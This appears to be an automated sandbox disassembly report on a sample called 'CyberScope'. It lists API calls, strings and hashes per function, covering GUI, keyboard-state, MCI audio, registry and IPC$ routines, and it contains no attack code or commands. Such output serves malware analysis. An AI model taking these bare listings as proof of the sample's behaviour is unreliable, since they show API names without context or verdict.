                                                                                    • Opcode ID: d96d182d3ea534051ecc437a958759a0124a8a475fd3a5e7397d6b8568297500
                                                                                    • Instruction ID: bd316ba280d3ad92b85b5fc6f2a801428d5e14b8f93e8e4d5a415c3064d7c995
                                                                                    • Opcode Fuzzy Hash: d96d182d3ea534051ecc437a958759a0124a8a475fd3a5e7397d6b8568297500
                                                                                    • Instruction Fuzzy Hash: 44318E72911129FBDB309F90EC8CEFFBBBCEF56710F000165A805E2150DB749E969AA0
                                                                                    APIs
                                                                                    • timeGetTime.WINMM ref: 001FEFCB
                                                                                      • Part of subcall function 001AF215: timeGetTime.WINMM(?,?,001FEFEB), ref: 001AF219
                                                                                    • Sleep.KERNEL32(0000000A), ref: 001FEFF8
                                                                                    • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 001FF01C
                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 001FF03E
                                                                                    • SetActiveWindow.USER32 ref: 001FF05D
                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001FF06B
                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 001FF08A
                                                                                    • Sleep.KERNEL32(000000FA), ref: 001FF095
                                                                                    • IsWindow.USER32 ref: 001FF0A1
                                                                                    • EndDialog.USER32(00000000), ref: 001FF0B2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                    • String ID: BUTTON
                                                                                    • API String ID: 1194449130-3405671355
                                                                                    • Opcode ID: ac4d1df9ae52a4d535c77e069552ff8149a9b4978eea1abf11240841e2b523d8
                                                                                    • Instruction ID: 99896f592ade500a7f1538d722f0f07d3c78f5229ceb9b5d203aadf489537fba
                                                                                    • Opcode Fuzzy Hash: ac4d1df9ae52a4d535c77e069552ff8149a9b4978eea1abf11240841e2b523d8
                                                                                    • Instruction Fuzzy Hash: AF21CF75500208BFE320AFA0FC8DA367BAEFB69714B049028FA0582272CBF58C168655
                                                                                    APIs
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001FF374
                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001FF38A
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001FF39B
                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 001FF3AD
                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 001FF3BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString$_wcslen
                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                    • API String ID: 2420728520-1007645807
                                                                                    • Opcode ID: 533978b5dea2ee8e34fae0f116ea4d475e7cfe3dc585c9f7710525244439d03d
                                                                                    • Instruction ID: a4faf01b377d2fef2ef0c7baf80560cda9fd38d75f24cb3aedf3d3bcca433d7d
                                                                                    • Opcode Fuzzy Hash: 533978b5dea2ee8e34fae0f116ea4d475e7cfe3dc585c9f7710525244439d03d
                                                                                    • Instruction Fuzzy Hash: DB11A7316A025D79DB20A7A5EC4AEFF6ABCFFD2B00F4004297901E20D0DBB05909C5F4
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 001C3007
                                                                                      • Part of subcall function 001C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,001CDB51,?,00000000,?,00000000,?,001CDB78,?,00000007,?,?,001CDF75,?), ref: 001C2D4E
                                                                                      • Part of subcall function 001C2D38: GetLastError.KERNEL32(?,?,001CDB51,?,00000000,?,00000000,?,001CDB78,?,00000007,?,?,001CDF75,?,?), ref: 001C2D60
                                                                                    • _free.LIBCMT ref: 001C3013
                                                                                    • _free.LIBCMT ref: 001C301E
                                                                                    • _free.LIBCMT ref: 001C3029
                                                                                    • _free.LIBCMT ref: 001C3034
                                                                                    • _free.LIBCMT ref: 001C303F
                                                                                    • _free.LIBCMT ref: 001C304A
                                                                                    • _free.LIBCMT ref: 001C3055
                                                                                    • _free.LIBCMT ref: 001C3060
                                                                                    • _free.LIBCMT ref: 001C306E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID: &#
                                                                                    • API String ID: 776569668-2240308938
                                                                                    • Opcode ID: c423436bf530b95c36314ab3998289525cd5ab14bfdb786a46b729b31fbb5882
                                                                                    • Instruction ID: bb95632a7208cdf010b0e525c5ccce0dd059283a6218cd63c91789ee12092da7
                                                                                    • Opcode Fuzzy Hash: c423436bf530b95c36314ab3998289525cd5ab14bfdb786a46b729b31fbb5882
                                                                                    • Instruction Fuzzy Hash: 8411B676100108BFCB01EF94C842EED3BB5EF35750B8144A9FA099F222DB31EE919B90
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?), ref: 001FA9D9
                                                                                    • SetKeyboardState.USER32(?), ref: 001FAA44
                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 001FAA64
                                                                                    • GetKeyState.USER32(000000A0), ref: 001FAA7B
                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 001FAAAA
                                                                                    • GetKeyState.USER32(000000A1), ref: 001FAABB
                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 001FAAE7
                                                                                    • GetKeyState.USER32(00000011), ref: 001FAAF5
                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 001FAB1E
                                                                                    • GetKeyState.USER32(00000012), ref: 001FAB2C
                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 001FAB55
                                                                                    • GetKeyState.USER32(0000005B), ref: 001FAB63
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: State$Async$Keyboard
                                                                                    • String ID:
                                                                                    • API String ID: 541375521-0
                                                                                    • Opcode ID: cc834e11ee4d7ffd1797bcaaea097eb43bd5163ab7587913bd0381aa158ee567
                                                                                    • Instruction ID: 9ab91b1743e0bcac65c1ccef0ce027e2d57d1424dba05066bc087594d17f13c6
                                                                                    • Opcode Fuzzy Hash: cc834e11ee4d7ffd1797bcaaea097eb43bd5163ab7587913bd0381aa158ee567
                                                                                    • Instruction Fuzzy Hash: 2951D8B0A0878C29FB35D7A08854BFABFB59F11344F884599C6C65B1C2DB989B4CC763
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,00000001), ref: 001F6649
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 001F6662
                                                                                    • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 001F66C0
                                                                                    • GetDlgItem.USER32(?,00000002), ref: 001F66D0
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 001F66E2
                                                                                    • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 001F6736
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 001F6744
                                                                                    • GetWindowRect.USER32(00000000,?), ref: 001F6756
                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 001F6798
                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 001F67AB
                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001F67C1
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 001F67CE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                    • String ID:
                                                                                    • API String ID: 3096461208-0
                                                                                    • Opcode ID: 92a3a11b528ceb87d5ae71d154a0c8476b640d5899a79128312cf7995b811e19
                                                                                    • Instruction ID: 97116dfbf93617571a326b70a14a7e49401f1b0f239a88b4f3ddc23567cd4fac
                                                                                    • Opcode Fuzzy Hash: 92a3a11b528ceb87d5ae71d154a0c8476b640d5899a79128312cf7995b811e19
                                                                                    • Instruction Fuzzy Hash: 24511171A00209AFDF18DFA8DD89ABEBBB9FB48315F108229F515E7294D7709D05CB50
                                                                                    APIs
                                                                                      • Part of subcall function 00192234: GetWindowLongW.USER32(?,000000EB), ref: 00192242
                                                                                    • GetSysColor.USER32(0000000F), ref: 00192152
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ColorLongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 259745315-0
                                                                                    • Opcode ID: 131f3090944def390b5e8388a8b506be29ab0368fbce8316225d5c0d6e1a2dd6
                                                                                    • Instruction ID: 35f6e04705161173e89c8817ff647b2029f1815e5f576677bbbb570165ea59f3
                                                                                    • Opcode Fuzzy Hash: 131f3090944def390b5e8388a8b506be29ab0368fbce8316225d5c0d6e1a2dd6
                                                                                    • Instruction Fuzzy Hash: 0941AE31100640BFDF345F78AC48BBA3BA5AB42320F254265FAB68B2E5C7719D62DB11
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 001D28D1
                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001D28EA
                                                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001D28FA
                                                                                    • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001D2912
                                                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001D2933
                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001911F5,00000000,00000000,00000000,000000FF,00000000), ref: 001D2942
                                                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 001D295F
                                                                                    • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001911F5,00000000,00000000,00000000,000000FF,00000000), ref: 001D296E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                    • String ID: (&
                                                                                    • API String ID: 1268354404-1801568203
                                                                                    • Opcode ID: 52c5a1b5368aae31f93d06bcc980ab5214030a51cdb836060732e72f2d52697e
                                                                                    • Instruction ID: d194566e081764766e1949fe9939843026164d2b1c14039eecd3b589504e5268
                                                                                    • Opcode Fuzzy Hash: 52c5a1b5368aae31f93d06bcc980ab5214030a51cdb836060732e72f2d52697e
                                                                                    • Instruction Fuzzy Hash: 8951883060020AFFDF28CF64DC45BAA7BB5FB58724F104529F952972A0D7B0E991DB50
                                                                                    APIs
                                                                                      • Part of subcall function 0019249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001924B0
                                                                                      • Part of subcall function 001919CD: GetCursorPos.USER32(?), ref: 001919E1
                                                                                      • Part of subcall function 001919CD: ScreenToClient.USER32(00000000,?), ref: 001919FE
                                                                                      • Part of subcall function 001919CD: GetAsyncKeyState.USER32(00000001), ref: 00191A23
                                                                                      • Part of subcall function 001919CD: GetAsyncKeyState.USER32(00000002), ref: 00191A3D
                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 002295C7
                                                                                    • ImageList_EndDrag.COMCTL32 ref: 002295CD
                                                                                    • ReleaseCapture.USER32 ref: 002295D3
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 0022966E
                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00229681
                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 0022975B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID$(&$(&
                                                                                    • API String ID: 1924731296-2936594980
                                                                                    • Opcode ID: 1231ebff50f53e6a3f5a875e1892ec1b80e7a36393f7215578ff92aaff2a4dd4
                                                                                    • Instruction ID: 57e18c845c409a674f075891b99f6802fe8e9425b85e611c186004c555c6b3d2
                                                                                    • Opcode Fuzzy Hash: 1231ebff50f53e6a3f5a875e1892ec1b80e7a36393f7215578ff92aaff2a4dd4
                                                                                    • Instruction Fuzzy Hash: 9051E070514310AFDB04EF50EC9AFAA77E4FB98714F50062CF995A72E1CBB09A58CB52
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,001E0D31,00000001,0000138C,00000001,00000001,00000001,?,0020EEAE,00262430), ref: 001FA091
                                                                                    • LoadStringW.USER32(00000000,?,001E0D31,00000001), ref: 001FA09A
                                                                                      • Part of subcall function 0019B329: _wcslen.LIBCMT ref: 0019B333
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,001E0D31,00000001,0000138C,00000001,00000001,00000001,?,0020EEAE,00262430,?), ref: 001FA0BC
                                                                                    • LoadStringW.USER32(00000000,?,001E0D31,00000001), ref: 001FA0BF
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001FA1E0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString$Message_wcslen
                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                    • API String ID: 747408836-2268648507
                                                                                    • Opcode ID: ebf8538ae2ad676d62e587df719a80a46aca18a6ebd49c04e57c68a28c54a963
                                                                                    • Instruction ID: a1b1c37dbb516a1b3f2560b56b6ca7dd8c53aabcecefb42a27df0e0909e9d45d
                                                                                    • Opcode Fuzzy Hash: ebf8538ae2ad676d62e587df719a80a46aca18a6ebd49c04e57c68a28c54a963
                                                                                    • Instruction Fuzzy Hash: DF41127290411DAACF15FBE0ED86DEEB779AF28300F500065F606B2092EB756F59CB61
                                                                                    APIs
                                                                                      • Part of subcall function 00198577: _wcslen.LIBCMT ref: 0019858A
                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001F1093
                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001F10AF
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001F10CB
                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 001F10F5
                                                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 001F111D
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001F1128
                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001F112D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                    • API String ID: 323675364-22481851
                                                                                    • Opcode ID: 97a5bde35631e27a789edec84b91f5b9255dda02c1f2737f2f6dc750dcb1d77f
                                                                                    • Instruction ID: 10785b493d15926b33d0562baaea7021084febd72320020993cea88420ba86e3
                                                                                    • Opcode Fuzzy Hash: 97a5bde35631e27a789edec84b91f5b9255dda02c1f2737f2f6dc750dcb1d77f
                                                                                    • Instruction Fuzzy Hash: 0B41C772C1022DABDF25EBA4EC89DEEB7B8BF14750F444169E901A3161EB719E09CB50
                                                                                    APIs
                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00224AD9
                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00224AE0
                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00224AF3
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00224AFB
                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00224B06
                                                                                    • DeleteDC.GDI32(00000000), ref: 00224B10
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00224B1A
                                                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00224B30
                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00224B3C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                    • String ID: static
                                                                                    • API String ID: 2559357485-2160076837
                                                                                    • Opcode ID: d3e5d0ccd4ed9c29809b9993911e862999ebfa7000b0751a3eee29e4abfee88d
                                                                                    • Instruction ID: aa5cc1d71868c74d2b5316dda195bc7fa0b399d2ec11f2b32009766f78618fda
                                                                                    • Opcode Fuzzy Hash: d3e5d0ccd4ed9c29809b9993911e862999ebfa7000b0751a3eee29e4abfee88d
                                                                                    • Instruction Fuzzy Hash: C3316F31510225BBDF21AFE4EC08FDA3BA9FF0D364F110211FA15A61A0C775D861DB94
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 002146B9
                                                                                    • CoInitialize.OLE32(00000000), ref: 002146E7
                                                                                    • CoUninitialize.OLE32 ref: 002146F1
                                                                                    • _wcslen.LIBCMT ref: 0021478A
                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0021480E
                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00214932
                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0021496B
                                                                                    • CoGetObject.OLE32(?,00000000,00230B64,?), ref: 0021498A
                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 0021499D
                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00214A21
                                                                                    • VariantClear.OLEAUT32(?), ref: 00214A35
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 429561992-0
                                                                                    • Opcode ID: cb0eec73dd3871afec47c10f034219ab1edf7cda5ef0f6a05f732151a3d3907c
                                                                                    • Instruction ID: 8833886c719851afca27be6867f070fa827e54d46b192657f4a785e759890f96
                                                                                    • Opcode Fuzzy Hash: cb0eec73dd3871afec47c10f034219ab1edf7cda5ef0f6a05f732151a3d3907c
                                                                                    • Instruction Fuzzy Hash: 76C15771614305AFD700EF68C8849ABB7E9FF99748F10491DF9899B250DB30ED46CB52
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 00208538
                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 002085D4
                                                                                    • SHGetDesktopFolder.SHELL32(?), ref: 002085E8
                                                                                    • CoCreateInstance.OLE32(00230CD4,00000000,00000001,00257E8C,?), ref: 00208634
                                                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 002086B9
                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 00208711
                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0020879C
                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 002087BF
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 002087C6
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 0020881B
                                                                                    • CoUninitialize.OLE32 ref: 00208821
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
